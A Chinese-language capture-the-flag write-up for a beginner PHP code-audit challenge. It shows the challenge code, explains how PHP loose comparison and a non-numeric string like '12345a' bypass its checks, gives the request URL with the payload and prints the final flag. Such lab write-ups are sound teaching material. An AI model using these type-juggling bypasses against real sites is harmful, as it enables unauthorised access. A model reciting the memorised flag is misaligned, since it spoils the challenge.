题目来源:
Cyberpeace-n3k0
题目描述:
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
题目场景:
111.200.241.244:59184
题目思路:
题目为simple_php,根据题目信息,判断是关于php代码审计的
解题过程:
打开题目,得到一串php代码
<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){//只要将a=0e1即可
echo $flag1;
}
if(is_numeric($b)){//get的b不能是数字
exit();
}
if($b>1234){//但又必须大于1234,这里可以用b=12345a绕过
echo $flag2;
}
?>
代码就是以GET方式获得两个参数a和b,如果a和b满足一定条件,则打印flag1和flag2,将flag1和flag2拼接就能够得到完整flag,综合一下a和b,得到url为?a=0e10&b=12345a
,最后访问http://ip:port/?a=0e10&b=12345a
Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}